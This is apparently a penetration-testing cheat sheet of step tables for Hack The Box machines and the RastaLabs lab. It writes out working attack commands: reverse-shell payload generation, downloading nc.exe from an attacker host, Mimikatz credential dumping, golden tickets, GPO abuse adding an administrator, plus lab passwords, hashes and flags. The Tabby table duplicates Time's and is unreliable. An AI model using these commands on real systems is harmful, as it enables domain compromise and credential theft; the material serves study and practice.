# Network Scenarios

### Network#1

LLMNR Poisoning->AS-REP Roast->ForceChangePassword->GenericWrite->Password Spraying->RunForrestRun.exe->Abusing Vulnerable GPO->Abusing MSSQL Service Database->Abusing Domain Trusts

### Network#2

Service Permission->ForceChangePassword->Abuse ACLs->Abuse SQL Instance->Abuse Service->pass the ticket->golden ticket

### Network#3

always elevated->constrained delegation->unconstrained delegation print bug->cross trust->Abuse MSSQL Service

### Network#4

Bypass AMSI->always elevated->constrained delegation->Pass the ticket->Abuse SQL Instance->Abuse GPO->DCSync Attack

### Network#5

| ID | Stage       | Techniques                             | Commands                                                   |
| -- | ----------- | -------------------------------------- | ---------------------------------------------------------- |
| 1  | Enumeration | Online search for lab IP range         | N/A                                                        |
| 2  | Enumeration | Port scanning with masscan             | `masscan -p 80,135,139,445,443 -sT 10.10.110.0/24 -e tun0` |
| 3  | Enumeration | Detailed host scanning with nmap       | `nmap` (specific commands not provided)                    |
| 4  | Enumeration | Finding domain names with crackmapexec | `crackmapexec` (specific commands not provided)            |

### Reel

| ID | Stage                 | Techniques                     | Commands                                                                                                        |
| -- | --------------------- | ------------------------------ | --------------------------------------------------------------------------------------------------------------- |
| 1  | Recon                 | Nmap scanning                  | `nmap -sC -sV -oA nmap/result 10.10.10.210`                                                                     |
| 2  | Enumeration           | Gobuster directory scanning    | `gobuster dir -u https://10.10.10.210 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -k -t 50` |
| 3  | Credential Harvesting | Gathering usernames            | Gather usernames manually and create a `user.txt` file                                                          |
| 4  | Credential Harvesting | Password spraying              | `python3 atomizer.py owa 10.10.10.210 pass.txt user.txt -i 0:0:01`                                              |
| 5  | Phishing              | Sending phishing emails        | Use Outlook to send phishing emails and capture NTLMv2 hash with Responder                                      |
| 6  | Hash Cracking         | Cracking NTLMv2 hash           | `hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt --force`                                                 |
| 7  | Access                | PowerShell remote session      | `$offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson`   |
| 8  | Privilege Escalation  | Creating a Symlink             | `New-Item -ItemType Junction -Path 'C:\ProgramData\root' -Target 'C:\Users\Administrator'`                      |
| 9  | Privilege Escalation  | Using Check-File command       | `Check-File C:\programdata\root\Desktop\root.txt`                                                               |
| 10 | Exfiltration          | Transferring files with nc.exe | `iwr -uri http://10.10.xx.xx/nc.exe -o 'C:\Windows\System32\spool\drivers\color\nc.exe'`                        |

### Jewel

| ID | Stage                | Techniques                                | Commands                                                                        |
| -- | -------------------- | ----------------------------------------- | ------------------------------------------------------------------------------- |
| 1  | Recon                | Nmap scanning                             | `nmap -sC -sV -oA nmap/result 10.10.10.211`                                     |
| 2  | Web Enumeration      | Checking server with Wappalyzer           | Use Wappalyzer to identify backend technologies                                 |
| 3  | Web Enumeration      | Analyzing .git directory                  | Check the Gemfile in the .git directory for Ruby and Gem versions               |
| 4  | Exploitation         | Exploiting Ruby on Rails                  | Use a Ruby on Rails exploit                                                     |
| 5  | Post-Exploitation    | Capturing request in Burp                 | Capture the request and modify it with the exploit                              |
| 6  | Post-Exploitation    | Getting a reverse shell                   | Use netcat listener and send the exploit to get a reverse shell                 |
| 7  | Privilege Escalation | Cracking password hashes                  | Use John the Ripper to crack password hashes found in `/var/backups`            |
| 8  | Privilege Escalation | Using .google_authenticator file          | Use the contents of `.google_authenticator` to bypass two-factor authentication |
| 9  | Privilege Escalation | Synchronizing time for successful exploit | Adjust the system time to match the timezone for the exploit to work            |
| 10 | Privilege Escalation | Gaining root access with GTFOBins         | `sudo gem open -e "/bin/sh -c /bin/sh" rdoc` to gain root access                |

### Atom

| ID | Stage               | Techniques                           | Commands                                                                                     |
| -- | ------------------- | ------------------------------------ | -------------------------------------------------------------------------------------------- |
| 1  | Recon               | Nmap scanning                        | `nmap -sV -sC -oN nmap 10.10.10.237`                                                         |
| 2  | File Analysis       | Analyzing executable file            | `file heedv1\ Setup\ 1.0.0.exe`                                                              |
| 3  | SMB Enumeration     | Enumerating SMB shares               | `smbclient -L \\\\10.10.10.237`                                                              |
| 4  | SMB File Transfer   | Transferring files via SMB           | `smbclient \\\\10.10.10.237\\Software_Updates` then `get UAT_Testing_Procedures.pdf`         |
| 5  | Exploitation        | Crafting malicious binary            | `msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.30 LPORT=9001 -f exe -o "r'sp00f.exe"` |
| 6  | YML File Creation   | Creating a .yml file for the exploit | Manual creation of `latest.yml` file                                                         |
| 7  | SMB File Transfer   | Uploading .yml file via SMB          | `smbclient \\\\10.10.10.237\\Software_Updates` then `put latest.yml`                         |
| 8  | Reverse Shell       | Obtaining a reverse shell            | Use Metasploit to listen for the reverse shell                                               |
| 9  | Redis Exploitation  | Exploiting Redis                     | `redis-cli -h 10.10.10.237` then `get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0`      |
| 10 | Password Decryption | Decrypting password                  | `python3 decrypt.py` with the script provided in the summary                                 |

### Network1

| ID | Stage            | Techniques                     | Commands                                                             |
| -- | ---------------- | ------------------------------ | -------------------------------------------------------------------- |
| 1  | Data Analysis    | Reading pcap file              | Use NetworkMiner to read the `.dmp` file and extract the secret file |
| 2  | Cryptography     | Decoding the flag              | Use the `filecryptography.psm1` PowerShell module                    |
| 3  | File Preparation | Preparing files for decryption | Rename the secret file to `secret.txt.AES` on ws04                   |
| 4  | Key Conversion   | Converting key for decryption  | `$key = Get-Content key.txt` (rest of the command not provided in summary) |
| 5  | File Decryption  | Decrypting the file            | `Unprotect-File '.\secret.txt.AES' -Algorithm AES -Key $key`         |
| 6  | Flag Retrieval   | Retrieving the flag            | The flag is `RASTA{cryp70_3xf1l7r4710n}`                             |

### Network2

| ID | Stage                 | Techniques                      | Commands                                                                                                                   |
| -- | --------------------- | ------------------------------- | -------------------------------------------------------------------------------------------------------------------------- |
| 1  | Credential Dumping    | Enumerating credentials on WS02 | `Get-ChildItem C:\Users\epugh\AppData\Local\Microsoft\Credentials\ -force`                                                 |
| 2  | Credential Dumping    | Using Mimikatz to dump creds    | Upload `mimikatz.exe` and execute `sekurlsa::dpapi` to get the master key                                                  |
| 3  | Credential Decryption | Decrypting credentials          | `dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\Credentials\936A68B5AC87C545C4A22D1AF264C8E9 /masterkey:40fc84...` |
| 4  | Port Forwarding       | Setting up port forwarding      | `portfwd add -L 10.10.14.83 -r 10.10.122.15 -l 3389 -p 3389`                                                               |
| 5  | RDP Connection        | Connecting via RDP with Remmina | Install Remmina, import `sql01.rdp`, change host, export to `.rdp` file                                                    |
| 6  | RDP Connection        | Using xfreerdp to connect       | `xfreerdp sql.rdp /u:epugh_adm /d:rastalabs.local`                                                                         |
| 7  | Flag Retrieval        | Retrieving the flag             | The flag is `RASTA{c00k1n6_w17h_645_n0w}`                                                                                  |

### Network3

| ID | Stage                  | Techniques                                  | Commands                                                                                                                                                                                              |
| -- | ---------------------- | ------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 1  | Credential Enumeration | Finding LAPS group members                  | Enumeration to find `ngodfrey_adm` is part of LAPS group on WS05                                                                                                                                      |
| 2  | Credential Access      | Dumping credentials with PowerSploit        | `powershell -ep bypass` then `Import-module ./PowerSploit.psd1`                                                                                                                                       |
| 3  | Credential Access      | Using credentials for access                | `$SecPassword = ConvertTo-SecureString 'J5KCwKruINyCJBKd1dZU' -AsPlainText -Force` then `$cred = New-Object System.Management.Automation.PSCredential('rastalabs.local\ngodfrey_adm', $SecPassword)` |
| 4  | Credential Access      | Getting AD object with credentials          | `Get-ADObject -Name web01 -DomainController 10.10.120.1 -Credential $Cred`                                                                                                                            |
| 5  | Local Admin Passwords  | Retrieving local admin passwords            | Passwords are listed for WS01, WS02, WS03, WS04, WS05                                                                                                                                                 |
| 6  | Port Forwarding        | Setting up port forwarding with Meterpreter | `portfwd add -L 10.10.14.83 -r 10.10.121.101 -l 447 -p 445` and similar for other ports                                                                                                               |
| 7  | Exploitation           | Using MS17-010 exploit for admin shell      | `exploit/windows/smb/ms17_010_psexec` with `lport 80, 443, 8080`                                                                                                                                      |
| 8  | Flag Retrieval         | Retrieving flags from WS02 and WS04         | Flags are `RASTA{3v3ryb0dy_l0v35_l4p5}`, `RASTA{wh3r3_w45_2f4_!?}`, `RASTA{50m371m35_y0u_mu57_b4ck7r4ck}`                                                                                             |
| 9  | Post-Exploitation      | Running Mimikatz on WS02                    | `privilege::debug` then `sekurlsa::logonPasswords`                                                                                                                                                    |
| 10 | File Permissions       | Modifying file permissions for flag         | `icacls flag.txt /grant administrator:F` or `icacls flag.txt /grant RLAB\ahope:F`                                                                                                                     |

### Network4

| ID | Stage                | Techniques                         | Commands                                                                                                                                                                                                                                    |
| -- | -------------------- | ---------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 1  | Privilege Escalation | AS-REP Roasting                    | <p><code>Import-module ./asreproast.ps1</code><br><code>Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1</code><br><code>Invoke-ASREPRoast -Domain rastalabs.local -Server 10.10.120.1 \| select -expand hash</code></p> |
| 2  | Hash Extraction      | Saving Hash                        | Copy the hash to a txt file and save it with UTF-8 encoding                                                                                                                                                                                 |
| 3  | Wordlist Creation    | Using kwprocessor                  | `./kwp -z basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-changes.route > kwp3.txt`                                                                                                                                 |
| 4  | Password Cracking    | Using John the Ripper              | Use John the Ripper (jumbo version) to crack the hash                                                                                                                                                                                       |
| 5  | Credential Use       | Mapping the user's home share      | `net use H: \\fs01.rastalabs.local\home$\ngodfrey /user:ngodfrey "zaq123$%^&*()_+"`                                                                                                                                                         |
| 6  | Flag Retrieval       | Accessing Flag                     | The flag is `RASTA{k3rb3r05_15_7r1cky}`                                                                                                                                                                                                     |

### Network5

| ID | Stage          | Techniques                        | Commands                                                                                                                      |
| -- | -------------- | --------------------------------- | ----------------------------------------------------------------------------------------------------------------------------- |
| 1  | Enumeration    | Viewing shares on `fs01`          | `net view \\fs01 /all`                                                                                                        |
| 2  | Enumeration    | Using PowerSploit for enumeration | <p><code>powershell -ep bypass</code><br><code>Import-module ./PowerSploit.psd1</code><br><code>Get-NetShare \\fs01</code></p> |
| 3  | Flag Retrieval | Accessing open shares             | Flag is `RASTA{ju1cy_1nf0_1n_0p3n_5h4r35}`                                                                                    |

### Network6

| ID | Stage             | Techniques                          | Commands                                                                                                                                                                                                                                        |
| -- | ----------------- | ----------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 1  | Phishing          | Creating phishing HTA               | `python unicorn.py windows/meterpreter/reverse_https 10.10.14.83 443 hta`                                                                                                                                                                       |
| 2  | Web Server Setup  | Hosting HTA on Apache2              | <p><code>copy index.html launcher.hta /var/www/html</code><br><code>service apache2 start</code></p>                                                                                                                                            |
| 3  | Listener Setup    | Setting up Metasploit listener      | `msfconsole -r unicorn.rc`                                                                                                                                                                                                                      |
| 4  | Share Enumeration | Viewing shares on the network       | <p><code>net share</code><br><code>net view</code><br><code>net use K: \\hostname\share$</code><br><code>net view \\hostname /all</code></p>                                                                                                     |
| 5  | User Enumeration  | Displaying domain user accounts     | `net user /domain`                                                                                                                                                                                                                              |
| 6  | User Information  | Viewing user info                   | `net user [username] /domain`                                                                                                                                                                                                                   |
| 7  | Group Enumeration | Viewing domain group members        | `net group finance /domain`                                                                                                                                                                                                                     |
| 8  | Drive Enumeration | Listing logical drives              | <p><code>fsutil fsinfo drives</code><br><code>wmic logicaldisk get name</code><br><code>diskpart > list volume</code></p>                                                                                                                       |
| 9  | Network Recon     | Pinging servers for IP addresses    | <p><code>ping DC01</code><br><code>ping FS01</code><br><code>ping MX01</code><br><code>ping NIX01</code><br><code>ping SQL01</code><br><code>ping WS01</code><br><code>ping WS02</code><br><code>ping WS03</code><br><code>ping WS05</code></p> |
| 10 | Flag Retrieval    | Accessing the flag                  | Flag is `RASTA{w007_f007h0ld_l375_pwn}`                                                                                                                                                                                                         |
| 11 | KeePass Database  | Found KeePass database and key file | Located in `M:\Documents`                                                                                                                                                                                                                       |

### Network7

| ID | Stage                 | Techniques                             | Commands                                                                                     |
| -- | --------------------- | -------------------------------------- | -------------------------------------------------------------------------------------------- |
| 1  | User Enumeration      | Finding user directory on `fs01`       | `net user ahope /domain`                                                                     |
| 2  | Network Drive Mount   | Mounting network drive to access file  | `net use Q: \\fs01.rastalabs.local\home$\ahope /user:ahope "Labrador8209"`                   |
| 3  | File Conversion       | Converting .ppk to OpenSSH format      | `puttygen nix01.ppk -O private-openssh -o nix`                                               |
| 4  | Network Configuration | Adding route and running proxy server  | Commands for adding route and running socks4a proxy server on `ws01` not provided in summary |
| 5  | SSH Connection        | Connecting via SSH with proxychains    | `proxychains ssh -i nix ahope@10.10.122.20`                                                  |
| 6  | Privilege Escalation  | Using exploit for privilege escalation | Compile exploit with `gcc exp1.c -o exploit`                                                 |
| 7  | File Transfer         | Transferring exploit to target         | `proxychains scp -i nix -r exploit ahope@10.10.122.20:/home/ahope`                           |
| 8  | File Download         | Downloading file from remote to local  | `proxychains scp -i nix ahope@10.10.122.20:/usr/local/sbin/paycalc /root/Desktop/rasta`      |
| 9  | Flag Retrieval        | Retrieving the flag                    | Flag is `RASTA{y0ur3_4_b4ll3r_70_637_7h15}`                                                  |

### Network8

| ID | Stage                 | Techniques                           | Commands                                                                                             |
| -- | --------------------- | ------------------------------------ | ---------------------------------------------------------------------------------------------------- |
| 1  | Port Forwarding       | Forwarding port to `ws01`            | `portfwd add -L 10.10.14.83 -r 10.10.121.100 -l 445 -p 445`                                          |
| 2  | Remote Execution      | Using Metasploit psexec for shell    | Use msf psexec to get a shell on `ws01`                                                              |
| 3  | Remote Execution      | Using Impacket psexec for shell      | Use Impacket psexec to get a shell on `ws01`, add route in meterpreter                               |
| 4  | Proxy Configuration   | Setting SOCKS4a proxy in Metasploit  | Set socks4a proxy in msf, then edit `/etc/proxychains.conf`                                          |
| 5  | Enumeration           | Using CrackMapExec to enumerate      | `proxychains crackmapexec 10.10.120.1 -u rweston_da -H <hash> --ntds drsuapi`                        |
| 6  | Hash Dumping          | Dumping hashes                       | Dump hashes with CrackMapExec and proxychains                                                        |
| 7  | Credential Access     | Accessing vault with Mimikatz        | Use Mimikatz on `ws01` to access vault credentials                                                   |
| 8  | Credential Decryption | Decrypting credentials               | `dpapi::cred /in:C:\users\rweston\AppData\Local\Microsoft\Credentials\<hash> /masterkey:<masterkey>` |
| 9  | Impersonation         | Impersonating user with Incognito    | In meterpreter, load incognito and impersonate `rweston`                                             |
| 10 | Clipboard Monitoring  | Monitoring clipboard for credentials | Transfer shell to Empire and monitor clipboard                                                       |
| 11 | RDP Connection        | Connecting via RDP with credentials  | `xfreerdp /u:epugh_adm /p:IReallyH8LongPasswords! /v:10.10.110.10`                                   |
| 12 | Flag Retrieval        | Retrieving the flag                  | Flag is `RASTA{c4r3ful_h0w_y0u_h4ndl3_cr3d5}`                                                        |

### Network9

| ID | Stage           | Techniques              | Commands                                                                                |
| -- | --------------- | ----------------------- | --------------------------------------------------------------------------------------- |
| 1  | Port Forwarding | Forwarding port to ws05 | `portfwd add -L 10.10.14.83 -r 10.10.123.102 -l 445 -p 445`                             |
| 2  | Credential Use  | Using rweston_da hash   | `rweston_da hash --- ab7b75ff84475be2e8c4dcb7390955c3:3ff61fa259deee15e4042159d7b832fa` |
| 3  | Exploitation    | Exploit via smb/psexec  | Use the hash with smb/psexec to exploit                                                 |
| 4  | Flag Retrieval  | Retrieving the flag     | Flag is `RASTA{53rv1c3_4bu53_f7w}`                                                      |

### Network10

| ID | Stage                | Techniques                          | Commands                                                                                                                                                                                                    |
| -- | -------------------- | ----------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 1  | Credential Use       | Using `epugh_adm` credentials       | Log in to `web01 (10.10.110.10)` and then RDP to `sql01 (10.10.122.15)` using `epugh_adm` creds                                                                                                             |
| 2  | Lateral Movement     | RDP to `fs01` with `gopikrishna`    | RDP to `fs01` with user `gopikrishna` [local admin]                                                                                                                                                         |
| 3  | Malware Execution    | Running `p0wnedshell.exe`           | Run `p0wnedshell.exe` with admin cmd                                                                                                                                                                        |
| 4  | Credential Dumping   | Invoke Mimikatz from `p0wnedshell`  | Use option 4 in `p0wnedshell`, invoke Mimikatz to get `rweston_da` NTLM hash                                                                                                                                |
| 5  | Credential Use       | Pass-the-hash with Mimikatz         | `sekurlsa::pth /user:rweston_da /domain:rastalabs.local /ntlm:3ff61fa259deee15e4042159d7b832fa`                                                                                                             |
| 6  | Golden Ticket Attack | Perform DCSync to get `krbtgt` hash | Use option 10 in `p0wnedshell`, perform DCSync                                                                                                                                                              |
| 7  | Golden Ticket Attack | Generate golden ticket              | `kerberos::golden /domain:rastalabs.local /user:rweston_da /sid:S-1-5-21-1396373213-2872852198-2033860859 /krbtgt:1b6e14bc52b67a2357f7938a8bbceb1b /ticket:C:\Users\GOPIKR~1\Desktop\rweston_da.ticket`     |
| 8  | Golden Ticket Attack | Use golden ticket                   | `kerberos::ptt C:\Users\GOPIKR~1\Desktop\rweston_da.ticket`                                                                                                                                                 |
| 9  | Flag Retrieval       | Accessing the flag                  | <p><code>pushd \\dc01.rastalabs.local\C$</code><br>Flag is <code>RASTA{r4574l4b5_ch4mp10n}</code></p>                                                                                                      |

### Network11

| ID | Stage             | Techniques                            | Commands                                                                                                                                     |
| -- | ----------------- | ------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------- |
| 1  | Initial Access    | Using `epugh_adm` credentials         | Log in to `web01 (10.10.110.10)`                                                                                                             |
| 2  | Lateral Movement  | RDP to `sql01` with `epugh_adm` creds | Take RDP of `sql01 (10.10.122.15)` using `epugh_adm` credentials                                                                             |
| 3  | Database Access   | Start SQL Management Studio           | Start SQL Management Studio and connect via Windows authentication                                                                           |
| 4  | Database Querying | Querying SQL database                 | <p><code>use umbraco;</code><br><code>SELECT TABLE_NAME FROM umbraco.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'</code></p>    |
| 5  | Flag Retrieval    | Retrieving the flag from database     | <p><code>select * from Flag</code><br>Flag is <code>RASTA{d474b4535_4r3_u5u4lly_1n73r3571n6}</code></p>                                      |

### Network12

| ID | Stage              | Techniques                              | Commands                                                                                                                                                                                                                                                                                                           |
| -- | ------------------ | --------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ |
| 1  | Credential Use     | Logging in with `epugh_adm` credentials | `mstsc /v:web01 /u:epugh_adm /p:[password]`                                                                                                                                                                                                                                                                        |
| 2  | Lateral Movement   | RDP to `sql01` using `epugh_adm`        | `mstsc /v:sql01 /u:epugh_adm /p:[password]`                                                                                                                                                                                                                                                                        |
| 3  | GPO Enumeration    | Enumerating GPO permissions             | `Get-NetGPO` (rest of the pipeline not provided in summary)                                                                                                                                                                                                                                                        |
| 4  | Group Membership   | Checking group members                  | `net user epugh_adm /domain`                                                                                                                                                                                                                                                                                       |
| 5  | GPO Permission     | Finding GPO with weak permissions       | `Get-NetGPO -ComputerName fs01.rastalabs.local` (rest of the pipeline not provided in summary)                                                                                                                                                                                                                     |
| 6  | OU Enumeration     | Finding host with specific policy       | `Get-NetOU -GUID "{DCE628BF-341C-4503-8181-3B8865700F6A}"` (rest of the pipeline not provided in summary)                                                                                                                                                                                                          |
| 7  | Policy Enumeration | Identifying applied policy              | `Get-NetGPO -ComputerName fs01.rastalabs.local` (rest of the pipeline not provided in summary)                                                                                                                                                                                                                     |
| 8  | GPO Abuse          | Creating and applying immediate tasks   | <p><code>New-GPOImmediateTask -TaskName gop12i -GPODisplayName "Test GPO" -CommandArguments 'net user gopikrishna Ramco@12345 /add' -force</code><br><code>New-GPOImmediateTask -TaskName gopi131 -GPODisplayName "Test GPO" -CommandArguments 'net localgroup Administrators gopikrishna /add' -force</code></p>  |
| 9  | File Permissions   | Modifying permissions for `flag.txt`    | `icacls flag.txt /grant administrators:F`                                                                                                                                                                                                                                                                          |
| 10 | Flag Retrieval     | Retrieving the flag                     | Flag is `RASTA{6p0_4bu53_15_h4rdc0r3}`                                                                                                                                                                                                                                                                             |

### SneakyMailer

| ID | Stage                 | Techniques                       | Commands                                                                                                                                          |
| -- | --------------------- | -------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------- |
| 1  | Initial Recon         | Nmap scan                        | `nmap -sC -sV 10.10.10.197`                                                                                                                       |
| 2  | DNS Enumeration       | Brute-force subdomains           | `ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://sneakycorp.htb/ -H "Host: FUZZ.sneakycorp.htb" -fs 185` |
| 3  | Email Gathering       | Extract emails                   | Extract emails from `http://sneakycorp.htb/team.php` to `mails.txt`                                                                               |
| 4  | Phishing              | Send phishing emails             | Use `swaks` to send emails to addresses in `mails.txt`                                                                                            |
| 5  | Credential Harvesting | Decode credentials               | Use Burp Suite to decode credentials from intercepted traffic                                                                                     |
| 6  | Email Client Setup    | Configure email client           | Set up `evolution` with SMTP server and `paulbyrd@sneakymailer.htb` credentials                                                                   |
| 7  | FTP Access            | Access FTP                       | `ftp 10.10.10.197` with credentials obtained                                                                                                      |
| 8  | Reverse Shell         | Upload and trigger reverse shell | Upload `rev.php` via FTP and trigger with `curl`                                                                                                  |
| 9  | Privilege Escalation  | Add SSH key to authorized keys   | Add generated SSH key to `/home/low/.ssh/authorized_keys` via malicious package                                                                   |
| 10 | Sudo Exploitation     | Exploit sudo permissions         | Use `sudo /usr/bin/pip3` to execute a malicious package with a reverse shell                                                                      |

### Mango

| ID | Stage                | Techniques                       | Commands                                                                                                                   |
| -- | -------------------- | -------------------------------- | -------------------------------------------------------------------------------------------------------------------------- |
| 1  | Port Scanning        | Masscan and Nmap                 | <p><code>masscan -p1-65535,U:1-65535 10.10.10.162 --rate=1000 -e tun0</code><br><code>nmap \[options] \[target]</code></p> |
| 2  | Web Enumeration      | Checking web ports               | Access web service on ports 80 and 443                                                                                     |
| 3  | SSL Certificate      | Viewing certificate              | View SSL certificate details                                                                                               |
| 4  | Host File Editing    | Adding VHOST to hosts file       | Edit `/etc/hosts` to add `staging-order.mango.htb`                                                                         |
| 5  | NoSQL Injection      | Bypassing login                  | Use Burp Suite to intercept and modify request for NoSQL injection                                                         |
| 6  | Data Extraction      | Automating credential extraction | Run Python script to extract credentials for `admin` and `mango` users                                                     |
| 7  | SSH Connection       | Accessing SSH                    | SSH into the server using extracted credentials                                                                            |
| 8  | User Flag Access     | Retrieving user flag             | Use `su` to login as `admin` and retrieve user flag                                                                        |
| 9  | Privilege Escalation | Exploiting SUID file             | Use SUID file to read root flag or exploit for root access                                                                 |
| 10 | Root Flag Access     | Reading root flag                | Run binary or use `jjs` to read root flag                                                                                  |

### Time

| ID | Stage                            | Techniques                                       | Commands                                                                      |
| -- | -------------------------------- | ------------------------------------------------ | ----------------------------------------------------------------------------- |
| 1  | Reconnaissance                   | Nmap scan                                        | `nmap -sC -sV -oA nmap/result 10.10.10.214`                                   |
| 2  | Web Vulnerability Scan           | Checking for JSON vulnerabilities                | Use JSON Beautifier and Validator on `http://10.10.10.214`                    |
| 3  | Exploitation                     | Exploiting CVE-2019-12384 in fasterxml           | Create `dedsec.sql` with payload and serve it with Python HTTP server         |
| 4  | Initial Access                   | Gaining a shell as user `pericles`               | Input crafted JSON to trigger the exploit and gain a shell                    |
| 5  | Privilege Escalation             | Using `timer_backup.sh` for privilege escalation | Add your SSH public key to `/root/.ssh/authorized_keys` via `timer_backup.sh` |
| 6  | Alternative Privilege Escalation | Escalating privileges without SSH key            | Use `timer_backup.sh` to add SUID bit to `/bin/bash` and open a root shell    |
| 7  | Flag Capture                     | Capturing user and root flags                    | Use the gained shell to capture `user.txt` and `root.txt`                     |

### Tabby

| ID | Stage                            | Techniques                                       | Commands                                                                      |
| -- | -------------------------------- | ------------------------------------------------ | ----------------------------------------------------------------------------- |
| 1  | Reconnaissance                   | Nmap scan                                        | `nmap -sC -sV -oA nmap/result 10.10.10.194`                                   |
| 2  | Web Enumeration                  | Checking for JSON vulnerabilities                | Use JSON Beautifier and Validator on `http://10.10.10.214`                    |
| 3  | Exploitation                     | Exploiting CVE-2019-12384 in fasterxml           | Create `dedsec.sql` with payload and serve it with Python HTTP server         |
| 4  | Initial Access                   | Gaining a shell as user `pericles`               | Input crafted JSON to trigger the exploit and gain a shell                    |
| 5  | Privilege Escalation             | Using `timer_backup.sh` for privilege escalation | Add your SSH public key to `/root/.ssh/authorized_keys` via `timer_backup.sh` |
| 6  | Alternative Privilege Escalation | Escalating privileges without SSH key            | Use `timer_backup.sh` to add SUID bit to `/bin/bash` and open a root shell    |
| 7  | Flag Capture                     | Capturing user and root flags                    | Use the gained shell to capture `user.txt` and `root.txt`                     |

### Quick

| ID | Stage                | Techniques                | Commands                                                                                                |
| -- | -------------------- | ------------------------- | ------------------------------------------------------------------------------------------------------- |
| 1  | Reconnaissance       | Nmap scan                 | `nmap -sC -sV -oA nmap/result 10.10.10.186`                                                             |
| 2  | Web Enumeration      | Dirbuster scan            | `dirbuster`                                                                                             |
| 3  | QUIC Protocol Access | Accessing HTTP/3 Protocol | `cargo run --manifest-path=tools/apps/Cargo.toml --bin quiche-client -- --no-verify https://quick.htb/` |

### ForwardSlash

| ID | Stage                      | Techniques                      | Commands                                                                              |
| -- | -------------------------- | ------------------------------- | ------------------------------------------------------------------------------------- |
| 1  | Reconnaissance             | Nmap scan                       | `nmap -T4 -p- -oA forwardslash.scan forwardslash.htb`                                 |
| 2  | Subdomain Enumeration      | WFUZZ fuzzing                   | Use WFUZZ with common wordlists to find subdomains                                    |
| 3  | Directory Enumeration      | GoBuster scanning               | Use GoBuster to enumerate directories                                                 |
| 4  | LFI Vulnerability          | Exploiting Local File Inclusion | Use Burp Suite to exploit LFI and directory traversal                                 |
| 5  | Database Credential Access | Obtaining credentials via LFI   | Use LFI to read `var/www/backup.forwardslash.htb/config.php` for database credentials |
| 6  | API Exploitation           | Using `php://filter` wrapper    | Exploit API with `php://filter/convert.base64_encode/resource` to read files          |
| 7  | FTP Credential Access      | Decoding Base64 for credentials | Decode Base64 to find FTP credentials                                                 |
| 8  | SSH Access                 | Using FTP credentials for SSH   | Use FTP credentials to access SSH                                                     |
| 9  | User Flag Acquisition      | Enumerating user directories    | Find and read `user.txt` in user's directory                                          |

### P.O.O

| ID | Stage                 | Techniques                 | Commands                                                                                            |
| -- | --------------------- | -------------------------- | --------------------------------------------------------------------------------------------------- |
| 1  | Reconnaissance        | Nmap Scanning              | `nmap -p- -A -T4 poo.htb`                                                                           |
| 2  | Directory Enumeration | Fuzzing with WFUZZ         | `wfuzz --hc 404 -w /usr/share/seclists/Discovery/Web-Content/SVNDigger/all.txt http://poo.htb/FUZZ` |
| 3  | Exploitation          | Exploiting .DS\_Store File | Use `ds_store_exp` tool to extract information from the .DS\_Store file                             |

### P.O.O 2

| ID | Stage                       | Techniques                                  | Commands                                                                                                                         |
| -- | --------------------------- | ------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------- |
| 1  | Initial Recon               | Nmap Scanning                               | `nmap -p 1-16000 dyplesher.htb`                                                                                                  |
| 2  | Web Enumeration             | WFUZZ Directory Discovery                   | `wfuzz -u http://test.dyplesher.htb/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt` |
| 3  | Git Repository Cloning      | Using GitDumper                             | `./gitdumper.sh http://test.dyplesher.htb/.git/ test.dyplesher`                                                                  |
| 4  | Memcached Credential Access | Using memcached-cli to retrieve credentials | `memcached-cli felamos:zxcvbnm@dyplesher.htb:11211`                                                                              |
| 5  | Password Cracking           | Using John the Ripper                       | Use John the Ripper with retrieved hashes                                                                                        |
| 6  | Gogs Service Access         | Logging into Gogs with cracked credentials  | Log into Gogs service at port 3000                                                                                               |
| 7  | Git Bundle Analysis         | Unpacking Git Bundles                       | Move .bundle files to 'Bundle-Unpack' directory and use Git Clone to unpack                                                      |

### Dyplesher

| ID | Stage                       | Techniques                | Commands                                                                                                                         |
| -- | --------------------------- | ------------------------- | -------------------------------------------------------------------------------------------------------------------------------- |
| 1  | Initial Recon               | Nmap Scanning             | `nmap -p 1-16000 dyplesher.htb`                                                                                                  |
| 2  | Web Enumeration             | WFUZZ Directory Discovery | `wfuzz -u http://test.dyplesher.htb/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt` |
| 3  | Cloning Exposed Repository  | Using GitDumper           | `./gitdumper.sh http://test.dyplesher.htb/.git/ test.dyplesher`                                                                  |
| 4  | Memcached Credential Access | Using memcached-cli       | `memcached-cli felamos:zxcvbnm@dyplesher.htb:11211`                                                                              |
| 5  | Cracking Hashes             | Using John the Ripper     | Use John the Ripper with retrieved hashes                                                                                        |
| 6  | Gogs Service Access         | Logging into Gogs         | Log into Gogs service at port 3000                                                                                               |
| 7  | Git Bundle Analysis         | Unpacking Git Bundles     | Move .bundle files to 'Bundle-Unpack' directory and use Git Clone to unpack                                                      |

### Cascade

| ID | Stage               | Techniques                         | Commands                                                       |
| -- | ------------------- | ---------------------------------- | -------------------------------------------------------------- |
| 1  | Initial Recon       | Nmap Scanning                      | `nmap -sV -p- -oA cascade.nmap cascade.htb`                    |
| 2  | User Enumeration    | Enum4Linux                         | `enum4linux -a cascade.htb`                                    |
| 3  | LDAP Enumeration    | Impacket LDAPSearch                | `impacket-ldapsearch -u 'r.thompson' -p 'rY4n5eva'`            |
